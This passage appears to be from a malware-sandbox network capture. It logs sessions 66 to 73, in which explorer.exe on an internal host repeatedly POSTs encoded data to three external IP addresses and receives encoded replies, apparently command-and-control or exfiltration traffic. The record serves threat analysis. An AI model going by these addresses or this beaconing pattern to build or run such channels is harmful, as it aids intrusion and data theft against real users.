M+avRICx5haWO9rK64zWB22qgB9f1DXGk0dyQpthxfeEF0TN55buZe0oKt5mucSheWueuia2V4hIQIBkPZ4A7alZ8jS/0bjsUBVEfzakhVDxeSu6bgOv5P6ZLK9TR0lAGg/Scy6APiV+QQ4AqkQifATPaiXDVyyX1p8+nP5xLXxxIuogC/iEi5KS/0AG3TpszdDYajEXzE6WSw3v+r4bBlqAOYgBUF0iARo+UTumDai/tbS/hHJVAS3XF1SzgoZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	62351	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:40 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:40 UTC	1122	OUT	Data Raw: 51 50 78 42 51 4b 56 37 76 53 66 52 4a 4c 65 48 39 46 58 46 72 6e 75 42 31 49 73 58 4a 38 59 58 66 6f 32 4d 62 2b 7a 41 62 33 57 6e 55 33 6d 56 5a 63 55 30 43 38 4d 63 77 64 72 50 50 31 68 2f 65 6a 6f 4c 33 48 75 30 71 67 65 61 78 71 4c 44 75 46 57 70 72 4d 6f 48 31 69 35 30 57 71 47 6f 6d 6c 52 42 71 4a 2b 33 34 35 30 35 2b 38 4c 6b 41 31 49 66 59 56 70 50 55 77 55 70 46 4c 6b 74 55 4e 38 2b 38 2b 56 6b 79 39 6b 30 6c 58 30 5a 2f 37 37 52 73 69 46 5a 4f 2f 45 56 63 68 30 7a 7a 69 73 6e 67 6f 32 2f 77 79 6f 37 79 34 34 31 39 71 63 48 35 4d 42 31 77 61 2f 6c 47 47 30 37 2f 7a 4c 57 45 6f 6a 4d 2b 54 77 6f 2f 36 55 53 71 73 4d 63 2b 6d 37 52 4b 6a 50 58 4b 4d 46 55 31 34 45 75 52 69 33 42 70 46 7a 47 57 2b 6d 6d 64 33 34 45 71 2b 65 41 78 62 4c 4e 37 4f 51 Data Ascii: QPxBQKV7vSfRJLeH9FXFrnuB1IsXJ8YXfo2Mb+zAb3WnU3mVZcU0C8McwdrPP1h/ejoL3Hu0qgeaxqLDuFWprMoH1i50WqGomlRBqJ+34505+8LkA1IfYVpPUwUpFLktUN8+8+Vky9k0lX0Z/77RsiFZO/EVch0zzisngo2/wyo7y4419qcH5MB1wa/lGG07/zLWEojM+Two/6USqsMc+m7RKjPXKMFU14EuRi3BpFzGW+mmd34Eq+eAxbLN7OQ
2024-07-27 05:45:41 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:41 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:41 UTC	685	IN	Data Raw: 6d 43 70 64 42 53 74 4b 53 6d 61 67 78 77 67 63 69 63 65 68 52 46 61 32 63 41 4a 43 6c 58 4f 78 66 31 42 36 78 6c 38 67 47 59 63 4d 6a 52 79 35 34 7a 4b 75 61 41 66 65 6b 4f 74 6b 79 2f 37 57 51 55 42 54 6a 2b 77 79 67 71 6e 46 4e 6a 48 5a 68 47 47 77 46 54 52 76 67 49 41 30 76 56 42 54 46 61 52 49 33 6f 66 6a 57 4f 6a 46 44 64 63 32 66 68 59 54 59 70 69 49 34 58 6e 34 37 70 68 6d 58 54 71 42 32 55 34 4a 6e 38 49 47 6a 42 58 4c 44 69 33 47 76 41 58 56 31 5a 41 57 55 59 39 31 6f 7a 43 31 2b 74 4d 44 54 30 46 65 7a 48 52 53 4c 69 34 30 75 56 6d 7a 59 64 42 35 67 44 2b 48 62 77 72 4c 53 46 51 70 62 6c 6b 48 78 64 66 50 74 43 32 65 48 51 52 57 6a 4e 36 50 48 79 6b 4a 72 71 2f 42 77 73 67 55 52 6f 51 49 71 44 79 43 31 66 76 5a 6d 41 68 4a 34 78 46 35 76 6a 70 Data Ascii: mCpdBStKSmagxwgcicehRFa2cAJClXOxf1B6xl8gGYcMjRy54zKuaAfekOtky/7WQUBTj+wygqnFNjHZhGGwFTRvgIA0vVBTFaRI3ofjWOjFDdc2fhYTYpiI4Xn47phmXTqB2U4Jn8IGjBXLDi3GvAXV1ZAWUY91ozC1+tMDT0FezHRSLi40uVmzYdB5gD+HbwrLSFQpblkHxdfPtC2eHQRWjN6PHykJrq/BwsgURoQIqDyC1fvZmAhJ4xF5vjp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	62352	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:42 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:42 UTC	1122	OUT	Data Raw: 62 61 6e 30 2b 62 49 72 38 55 43 71 56 63 4e 59 4f 75 54 52 6a 4f 43 48 71 30 46 79 66 4a 32 50 52 34 4b 77 6f 4a 38 30 59 4b 52 59 4c 5a 6c 77 48 67 71 78 42 37 37 2b 67 54 66 2f 4b 33 70 4b 7a 66 75 6b 6f 2f 42 59 64 4c 71 65 71 2b 4f 57 6a 36 43 54 74 4d 43 57 71 65 6d 75 4c 33 6f 79 2f 52 75 37 7a 76 4f 64 54 75 65 61 61 61 6c 77 49 67 68 70 71 47 37 76 70 71 33 51 4b 38 6f 46 74 79 50 41 42 43 65 69 31 32 33 4d 2f 6f 33 4f 61 73 73 67 69 62 7a 61 65 6b 4f 70 62 6a 65 71 51 34 33 46 41 79 49 5a 38 67 78 37 75 65 32 35 77 6d 6f 34 35 54 4e 6a 68 65 42 4a 43 35 71 56 77 47 2f 64 2f 54 56 59 4a 4b 6c 63 61 2f 6a 54 74 53 31 4e 49 56 59 79 75 4e 36 47 59 37 6f 38 75 4f 78 6e 4c 73 55 4f 35 4a 72 35 39 6a 32 6c 38 2f 4f 35 68 43 79 67 6f 78 68 2f 75 72 33 Data Ascii: ban0+bIr8UCqVcNYOuTRjOCHq0FyfJ2PR4KwoJ80YKRYLZlwHgqxB77+gTf/K3pKzfuko/BYdLqeq+OWj6CTtMCWqemuL3oy/Ru7zvOdTueaaalwIghpqG7vpq3QK8oFtyPABCei123M/o3OassgibzaekOpbjeqQ43FAyIZ8gx7ue25wmo45TNjheBJC5qVwG/d/TVYJKlca/jTtS1NIVYyuN6GY7o8uOxnLsUO5Jr59j2l8/O5hCygoxh/ur3
2024-07-27 05:45:44 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:43 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:44 UTC	685	IN	Data Raw: 79 75 41 69 6d 52 57 6c 5a 63 51 71 36 72 62 7a 44 79 77 59 59 61 68 32 31 57 48 75 70 72 46 57 79 71 2f 68 41 44 38 30 58 77 4b 36 4c 71 76 49 68 62 69 36 54 46 4c 71 51 41 79 31 73 31 53 6c 79 63 5a 6f 6e 50 6e 73 5a 7a 6e 4e 6d 45 72 57 65 71 4a 71 72 43 38 53 44 38 45 33 79 69 51 68 4d 76 62 44 38 67 47 47 4b 43 45 42 58 69 4c 57 58 78 72 4c 4a 78 70 72 4d 67 55 77 76 2f 38 5a 32 70 31 76 53 46 39 58 6a 74 78 66 62 4c 6f 53 55 4f 4e 38 31 37 2f 51 48 56 62 61 48 69 2f 30 53 48 70 70 73 59 59 63 4c 67 76 53 78 6a 70 42 66 50 62 41 73 46 30 73 2b 43 35 35 69 6c 30 59 4e 4a 4d 2b 37 72 76 46 6b 38 67 53 49 58 31 56 34 76 44 44 4c 73 4d 6b 77 75 43 77 41 70 71 43 2f 33 57 55 6b 65 70 53 32 4b 2b 62 51 2f 45 33 6a 4c 4f 49 55 48 6e 65 4c 38 68 6f 4f 48 37 Data Ascii: yuAimRWlZcQq6rbzDywYYah21WHuprFWyq/hAD80XwK6LqvIhbi6TFLqQAy1s1SlycZonPnsZznNmErWeqJqrC8SD8E3yiQhMvbD8gGGKCEBXiLWXxrLJxprMgUwv/8Z2p1vSF9XjtxfbLoSUON817/QHVbaHi/0SHppsYYcLgvSxjpBfPbAsF0s+C55il0YNJM+7rvFk8gSIX1V4vDDLsMkwuCwApqC/3WUkepS2K+bQ/E3jLOIUHneL8hoOH7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	62354	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:44 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:44 UTC	1122	OUT	Data Raw: 4c 51 6b 69 39 6c 38 71 30 56 79 2b 36 50 4e 4a 54 70 43 4e 70 59 66 6d 34 47 49 45 55 4c 66 68 71 76 66 75 46 61 42 77 49 5a 75 75 55 39 78 30 64 35 32 2b 6d 32 34 35 5a 62 45 4c 4b 7a 6b 52 57 6c 56 2b 52 35 77 67 36 7a 70 79 66 76 48 31 75 77 4a 39 46 6f 32 31 43 38 65 4c 75 75 5a 6b 63 36 77 49 65 4b 50 7a 6f 69 74 56 78 6b 43 78 4e 38 46 4f 2f 69 59 54 65 63 34 46 58 5a 53 5a 53 38 30 72 6a 6d 37 6b 65 4f 74 53 33 51 6a 79 46 38 62 48 45 62 58 36 55 6c 70 6f 41 44 66 72 56 58 33 6f 36 50 34 67 30 6b 64 75 48 63 38 5a 57 74 42 33 44 2f 49 53 4c 57 53 49 43 6a 71 45 30 4c 6f 34 63 4a 4a 48 56 45 53 31 45 36 4c 6f 73 2b 58 34 62 54 70 69 75 43 42 6a 6b 6e 51 33 4e 7a 73 7a 58 63 58 38 42 6d 54 68 4c 44 48 2f 62 6f 66 65 30 6a 75 35 46 52 6e 4b 6c 54 72 Data Ascii: LQki9l8q0Vy+6PNJTpCNpYfm4GIEULfhqvfuFaBwIZuuU9x0d52+m245ZbELKzkRWlV+R5wg6zpyfvH1uwJ9Fo21C8eLuuZkc6wIeKPzoitVxkCxN8FO/iYTec4FXZSZS80rjm7keOtS3QjyF8bHEbX6UlpoADfrVX3o6P4g0kduHc8ZWtB3D/ISLWSICjqE0Lo4cJJHVES1E6Los+X4bTpiuCBjknQ3NzszXcX8BmThLDH/bofe0ju5FRnKlTr
2024-07-27 05:45:46 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:46 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:46 UTC	685	IN	Data Raw: 6b 4e 45 4c 79 6e 41 4e 44 4b 57 50 79 57 4f 41 6c 50 66 39 79 54 38 42 71 71 67 58 75 59 37 37 4d 53 71 31 4b 67 6b 64 66 50 6a 70 66 73 70 6c 4a 64 76 44 37 37 37 48 47 4d 75 41 47 37 4a 56 65 35 4f 5a 6f 73 31 63 6c 54 53 31 58 74 64 33 62 35 51 66 71 6c 69 59 51 65 39 53 30 69 54 6d 61 48 58 31 6b 76 6c 2f 76 2b 71 6b 36 4b 2b 6f 64 56 47 71 2f 77 74 66 76 66 56 75 6e 6e 6a 7a 6d 79 66 63 44 70 69 6c 4c 43 50 55 46 6d 33 57 35 4c 53 4a 47 7a 7a 30 31 72 58 57 79 36 49 54 56 48 47 68 61 31 52 64 54 6c 68 4a 51 78 50 73 52 52 67 50 38 70 50 53 2b 43 5a 75 4b 39 2b 4c 6f 45 53 75 6b 4c 76 68 43 38 52 6a 49 71 41 51 54 39 4b 62 47 44 7a 6c 69 6a 4d 6f 2f 2b 64 2f 4d 6f 38 51 64 6d 38 41 6c 6e 4e 73 42 43 79 6b 69 58 67 70 4a 76 42 55 45 75 34 6a 39 52 36 Data Ascii: kNELynANDKWPyWOAlPf9yT8BqqgXuY77MSq1KgkdfPjpfsplJdvD777HGMuAG7JVe5OZos1clTS1Xtd3b5QfqliYQe9S0iTmaHX1kvl/v+qk6K+odVGq/wtfvfVunnjzmyfcDpilLCPUFm3W5LSJGzz01rXWy6ITVHGha1RdTlhJQxPsRRgP8pPS+CZuK9+LoESukLvhC8RjIqAQT9KbGDzlijMo/+d/Mo8Qdm8AlnNsBCykiXgpJvBUEu4j9R6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	62355	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:46 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:46 UTC	1122	OUT	Data Raw: 49 50 67 35 67 66 30 4a 4c 46 57 53 7a 69 33 6c 47 4a 4a 56 57 48 32 45 59 62 62 39 4b 32 66 71 73 65 73 49 66 77 4d 2b 4a 67 2b 61 77 4b 58 69 38 44 61 76 47 50 36 6c 37 4a 34 2b 69 61 31 57 44 6c 41 39 76 43 49 35 6a 5a 6b 31 4d 71 38 48 56 6d 5a 69 38 56 37 6d 69 76 71 4f 68 51 50 4e 4b 32 58 6d 59 6b 39 44 72 7a 76 6c 6d 53 79 70 79 7a 6a 66 68 2b 77 38 66 71 42 4c 32 49 64 32 59 62 2f 42 54 6b 70 79 78 64 6e 71 48 4f 67 65 76 46 31 4e 34 46 67 43 35 74 63 47 30 43 61 30 7a 32 49 79 37 7a 76 4f 65 65 2f 4f 44 47 34 75 2b 39 38 59 75 33 4c 2b 43 35 56 74 79 55 48 54 70 41 73 6d 35 4a 55 39 30 78 54 54 44 32 52 32 32 56 69 31 2f 38 4d 65 4f 66 69 41 43 58 56 2f 7a 70 32 79 72 31 75 72 2b 42 6e 45 45 49 46 2f 49 6c 78 49 4f 63 70 41 73 32 6d 6d 41 58 70 Data Ascii: IPg5gf0JLFWSzi3lGJJVWH2EYbb9K2fqsesIfwM+Jg+awKXi8DavGP6l7J4+ia1WDlA9vCI5jZk1Mq8HVmZi8V7mivqOhQPNK2XmYk9DrzvlmSypyzjfh+w8fqBL2Id2Yb/BTkpyxdnqHOgevF1N4FgC5tcG0Ca0z2Iy7zvOee/ODG4u+98Yu3L+C5VtyUHTpAsm5JU90xTTD2R22Vi1/8MeOfiACXV/zp2yr1ur+BnEEIF/IlxIOcpAs2mmAXp
2024-07-27 05:45:47 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:47 UTC	685	IN	Data Raw: 53 2f 64 7a 4b 34 66 37 51 68 54 31 37 70 47 76 47 45 42 6f 66 53 34 77 65 6f 74 77 46 39 43 78 68 32 75 7a 36 72 30 5a 53 4f 70 79 61 41 50 77 6e 48 32 75 30 5a 76 70 5a 73 69 77 48 31 53 68 78 64 68 50 4d 46 58 49 74 71 70 45 6c 49 5a 57 79 6a 33 32 5a 4b 2b 56 35 49 69 58 45 65 4e 70 6b 44 38 2f 48 52 51 46 65 69 64 5a 63 65 32 42 57 4e 4a 5a 35 71 36 48 43 77 5a 41 71 45 72 58 69 66 39 68 62 69 33 43 41 4f 42 33 42 46 58 6d 37 4f 52 5a 46 70 75 79 4b 6a 4e 2f 4f 64 75 48 4a 4a 41 39 34 31 70 6d 2f 47 34 73 79 73 2f 6b 69 59 37 31 4b 35 2b 49 39 73 54 62 6b 30 6c 31 51 37 70 2f 64 53 75 4d 33 59 69 78 6a 45 78 52 4b 41 38 64 6a 66 69 35 6b 4c 4b 31 64 6a 6e 34 74 31 77 7a 30 71 6b 71 38 5a 6a 6e 6d 49 64 55 32 31 70 4e 38 7a 6d 49 33 56 33 6d 6c 4d 2b Data Ascii: S/dzK4f7QhT17pGvGEBofS4weotwF9Cxh2uz6r0ZSOpyaAPwnH2u0ZvpZsiwH1ShxdhPMFXItqpElIZWyj32ZK+V5IiXEeNpkD8/HRQFeidZce2BWNJZ5q6HCwZAqErXif9hbi3CAOB3BFXm7ORZFpuyKjN/OduHJJA941pm/G4sys/kiY71K5+I9sTbk0l1Q7p/dSuM3YixjExRKA8djfi5kLK1djn4t1wz0qkq8ZjnmIdU21pN8zmI3V3mlM+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	62356	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:48 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:45:48 UTC	1267	OUT	Data Raw: 4f 57 37 54 53 7a 70 35 36 37 6e 72 76 41 6b 48 56 39 2b 6d 59 75 44 78 58 56 62 37 77 67 2b 4c 7a 4c 4e 31 67 6c 51 76 5a 36 45 44 57 58 69 6d 47 67 7a 41 74 6e 79 73 32 6a 59 79 30 56 58 2f 57 71 52 53 72 5a 39 58 77 53 37 56 56 4a 32 72 35 4d 55 2b 4f 59 79 68 74 34 45 49 34 7a 4e 7a 49 5a 6d 69 68 71 2b 76 48 63 35 74 4e 78 32 66 36 6b 4b 65 4a 32 6e 59 6f 33 64 71 57 43 50 52 62 43 79 77 2f 56 67 36 4e 4d 6a 69 4a 4d 56 4a 36 4e 4a 52 62 51 7a 35 39 42 56 32 56 45 2f 45 50 4e 53 39 4d 6b 38 54 53 6b 34 34 54 4c 47 70 37 6b 71 69 37 78 55 55 30 36 67 4e 4a 64 57 73 57 79 42 33 4d 65 74 50 48 52 56 4f 62 69 58 74 6f 58 65 30 76 54 4e 5a 33 6c 33 57 55 36 2f 43 2f 42 36 67 4a 58 33 76 69 6b 74 37 2f 62 63 62 50 44 52 2b 46 71 41 54 45 79 51 39 37 6d 62 Data Ascii: OW7TSzp567nrvAkHV9+mYuDxXVb7wg+LzLN1glQvZ6EDWXimGgzAtnys2jYy0VX/WqRSrZ9XwS7VVJ2r5MU+OYyht4EI4zNzIZmihq+vHc5tNx2f6kKeJ2nYo3dqWCPRbCyw/Vg6NMjiJMVJ6NJRbQz59BV2VE/EPNS9Mk8TSk44TLGp7kqi7xUU06gNJdWsWyB3MetPHRVObiXtoXe0vTNZ3l3WU6/C/B6gJX3vikt7/bcbPDR+FqATEyQ97mb
2024-07-27 05:45:50 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:49 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:50 UTC	685	IN	Data Raw: 59 62 64 62 58 5a 33 52 71 7a 38 30 33 42 56 67 4f 2f 2f 74 4a 65 47 46 49 59 6c 76 6e 6b 2f 63 65 37 4c 4d 62 30 56 2b 4a 67 6a 33 34 78 66 73 74 6a 2b 55 39 47 7a 75 2b 42 52 70 72 34 64 55 63 63 64 54 56 32 57 6e 69 57 59 68 6b 76 69 48 59 62 6d 5a 72 49 57 33 52 67 58 75 38 46 7a 51 57 52 35 77 76 55 6a 42 42 6b 74 70 58 2f 66 59 31 68 59 63 38 52 6e 4a 53 6a 72 47 6b 64 47 67 4f 4b 6f 6a 43 52 76 33 2f 4d 4c 71 41 49 53 2f 66 59 63 78 71 79 79 54 6b 57 69 6b 64 38 6b 50 42 4e 43 6d 39 38 4f 66 59 6c 33 48 38 4e 55 66 67 45 78 57 63 41 55 52 49 4f 77 66 6e 56 2b 6c 53 75 4c 77 6d 72 2f 69 44 79 69 42 4a 71 75 58 57 54 73 62 74 41 51 61 51 47 67 75 6c 79 75 6d 32 76 32 6d 36 65 6f 34 6a 38 69 6f 31 77 56 6d 59 30 6e 6a 63 42 4c 2f 52 59 7a 46 42 6a 6f Data Ascii: YbdbXZ3Rqz803BVgO//tJeGFIYlvnk/ce7LMb0V+Jgj34xfstj+U9Gzu+BRpr4dUccdTV2WniWYhkviHYbmZrIW3RgXu8FzQWR5wvUjBBktpX/fY1hYc8RnJSjrGkdGgOKojCRv3/MLqAIS/fYcxqyyTkWikd8kPBNCm98OfYl3H8NUfgExWcAURIOwfnV+lSuLwmr/iDyiBJquXWTsbtAQaQGgulyum2v2m6eo4j8io1wVmY0njcBL/RYzFBjo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	62358	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:50 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:50 UTC	1122	OUT	Data Raw: 4b 33 6d 52 6f 79 61 74 73 49 6a 38 6c 53 73 5a 2f 4f 66 48 54 68 71 2f 56 42 62 37 51 32 50 63 79 54 67 72 6d 43 47 65 71 4b 6c 67 5a 58 48 7a 43 62 44 38 73 6a 33 55 39 67 6e 47 34 45 4f 74 74 38 46 4f 72 6c 68 34 59 38 47 6a 62 65 5a 31 71 30 70 34 32 44 48 73 64 64 5a 6a 30 53 48 57 4b 61 2f 50 38 6e 52 6d 42 2b 6b 41 4c 57 45 65 76 75 33 36 4b 2f 68 52 44 50 38 64 30 35 48 67 72 36 66 50 63 5a 6a 4a 48 73 42 4e 37 5a 42 71 51 61 75 73 32 37 4d 4d 51 30 48 76 78 38 69 33 4e 42 51 65 34 62 4a 76 51 46 55 74 39 56 6e 6b 64 72 44 63 79 58 58 78 6c 44 6a 72 6e 55 77 68 4c 48 37 42 79 70 63 64 77 5a 61 4e 39 49 44 42 6e 67 4f 31 43 39 6a 49 6b 67 52 4d 72 61 73 2f 79 4a 6c 59 65 66 44 79 75 77 68 77 57 72 57 58 33 62 6e 34 46 32 33 79 6f 42 79 79 74 41 33 Data Ascii: K3mRoyatsIj8lSsZ/OfHThq/VBb7Q2PcyTgrmCGeqKlgZXHzCbD8sj3U9gnG4EOtt8FOrlh4Y8GjbeZ1q0p42DHsddZj0SHWKa/P8nRmB+kALWEevu36K/hRDP8d05Hgr6fPcZjJHsBN7ZBqQaus27MMQ0Hvx8i3NBQe4bJvQFUt9VnkdrDcyXXxlDjrnUwhLH7BypcdwZaN9IDBngO1C9jIkgRMras/yJlYefDyuwhwWrWX3bn4F23yoByytA3
2024-07-27 05:45:52 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:52 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:52 UTC	685	IN	Data Raw: 53 33 42 31 52 37 77 58 4d 70 67 56 66 63 66 35 42 6c 69 6e 68 52 78 46 51 4a 67 4b 73 4d 45 43 2f 59 39 73 37 6b 2b 31 75 74 52 65 75 44 63 69 77 6d 30 35 58 2b 77 76 2f 42 30 2b 74 59 30 62 5a 59 78 38 4d 44 30 70 38 56 64 6a 55 4d 63 75 61 32 2b 6a 61 59 38 42 6d 45 6e 44 2f 44 41 73 33 6d 70 71 65 51 45 49 75 41 4e 2f 44 76 6c 51 75 5a 44 31 72 4b 67 58 77 31 2b 44 41 50 53 42 69 39 51 5a 73 4c 56 30 4a 4f 63 46 56 43 30 46 4b 69 66 44 6d 42 5a 5a 2f 4f 39 41 6d 71 67 4d 76 41 39 67 69 30 63 50 42 35 47 44 6b 58 6d 38 44 48 64 6e 46 30 67 30 6d 7a 48 2b 4a 70 79 41 38 65 58 35 6b 47 36 57 6a 35 42 6d 4b 6a 69 2f 57 72 34 41 66 74 6c 49 44 31 58 58 57 68 44 4e 7a 6b 38 6b 58 37 43 72 39 53 45 4c 6a 6f 77 56 64 54 66 6d 38 6a 46 30 64 65 6a 45 72 77 77 Data Ascii: S3B1R7wXMpgVfcf5BlinhRxFQJgKsMEC/Y9s7k+1utReuDciwm05X+wv/B0+tY0bZYx8MD0p8VdjUMcua2+jaY8BmEnD/DAs3mpqeQEIuAN/DvlQuZD1rKgXw1+DAPSBi9QZsLV0JOcFVC0FKifDmBZZ/O9AmqgMvA9gi0cPB5GDkXm8DHdnF0g0mzH+JpyA8eX5kG6Wj5BmKji/Wr4AftlID1XXWhDNzk8kX7Cr9SELjowVdTfm8jF0dejErww

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	62359	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:53 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:53 UTC	1122	OUT	Data Raw: 4b 2f 51 4c 30 79 7a 6e 71 41 6f 33 67 34 33 58 49 4c 2f 47 33 42 59 63 68 67 4d 79 46 69 65 6d 78 68 46 6f 30 42 6f 69 62 2b 79 2b 4a 4d 30 48 55 4f 64 79 76 7a 71 53 76 6e 79 4b 32 64 4f 78 71 47 48 57 76 49 68 51 72 49 38 65 48 34 78 46 65 56 50 4d 75 2f 2b 58 55 7a 37 42 6b 4e 61 63 67 2b 68 46 78 4c 35 4c 56 72 4c 35 58 5a 56 56 74 55 66 6b 6f 69 72 76 5a 63 55 53 78 30 36 66 6d 79 50 4c 6f 50 64 71 49 32 34 6c 73 36 7a 46 4f 4b 68 69 33 75 48 68 6a 6d 52 48 57 33 71 69 36 65 34 76 50 30 37 42 70 35 69 43 2b 50 61 7a 74 48 2b 36 44 53 47 6a 66 66 6f 46 7a 36 33 41 32 6e 6e 33 7a 47 58 38 74 43 4b 63 45 66 58 35 52 77 71 4b 6e 42 65 66 34 49 73 47 72 4e 62 63 6b 70 6d 47 43 48 32 6e 75 77 66 51 65 69 36 4c 5a 48 4c 2f 55 52 33 37 54 55 70 61 38 51 63 Data Ascii: K/QL0yznqAo3g43XIL/G3BYchgMyFiemxhFo0Boib+y+JM0HUOdyvzqSvnyK2dOxqGHWvIhQrI8eH4xFeVPMu/+XUz7BkNacg+hFxL5LVrL5XZVVtUfkoirvZcUSx06fmyPLoPdqI24ls6zFOKhi3uHhjmRHW3qi6e4vP07Bp5iC+PaztH+6DSGjffoFz63A2nn3zGX8tCKcEfX5RwqKnBef4IsGrNbckpmGCH2nuwfQei6LZHL/UR37TUpa8Qc
2024-07-27 05:45:54 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:54 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:54 UTC	685	IN	Data Raw: 6e 52 76 54 48 61 6a 42 39 41 44 6b 46 37 63 41 4a 54 62 53 6c 77 6e 44 74 74 4e 6d 4a 32 55 73 34 53 58 4b 33 4d 73 56 73 4f 59 59 53 6c 41 64 61 34 6d 4c 41 46 41 77 6f 6b 70 79 55 4e 6f 30 75 38 64 46 52 72 33 73 65 67 6b 55 42 70 78 34 4c 65 4f 46 45 76 6c 32 4f 61 7a 71 68 2f 7a 41 34 6f 35 50 37 6e 6a 71 44 31 78 51 42 41 2f 6e 74 6b 6d 66 6e 36 31 33 6f 43 6e 31 79 71 38 65 38 32 38 6c 6f 70 46 4a 37 31 4f 45 54 55 63 41 39 75 6d 4b 68 47 53 57 48 5a 6e 64 55 44 34 38 46 31 75 6b 77 6b 49 69 42 57 54 69 2b 39 46 42 62 4d 61 57 4a 68 5a 45 50 34 66 4d 66 65 4c 39 67 6a 55 37 77 49 54 46 6d 51 30 64 6a 30 53 78 43 78 69 6e 66 44 65 59 6d 64 6c 75 2b 35 35 44 63 65 6b 70 54 71 64 6e 75 34 78 35 39 4b 4a 6c 53 7a 6e 51 77 34 5a 47 4a 67 6d 46 47 63 4a Data Ascii: nRvTHajB9ADkF7cAJTbSlwnDttNmJ2Us4SXK3MsVsOYYSlAda4mLAFAwokpyUNo0u8dFRr3segkUBpx4LeOFEvl2Oazqh/zA4o5P7njqD1xQBA/ntkmfn613oCn1yq8e828lopFJ71OETUcA9umKhGSWHZndUD48F1ukwkIiBWTi+9FBbMaWJhZEP4fMfeL9gjU7wITFmQ0dj0SxCxinfDeYmdlu+55DcekpTqdnu4x59KJlSznQw4ZGJgmFGcJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	62360	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:54 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
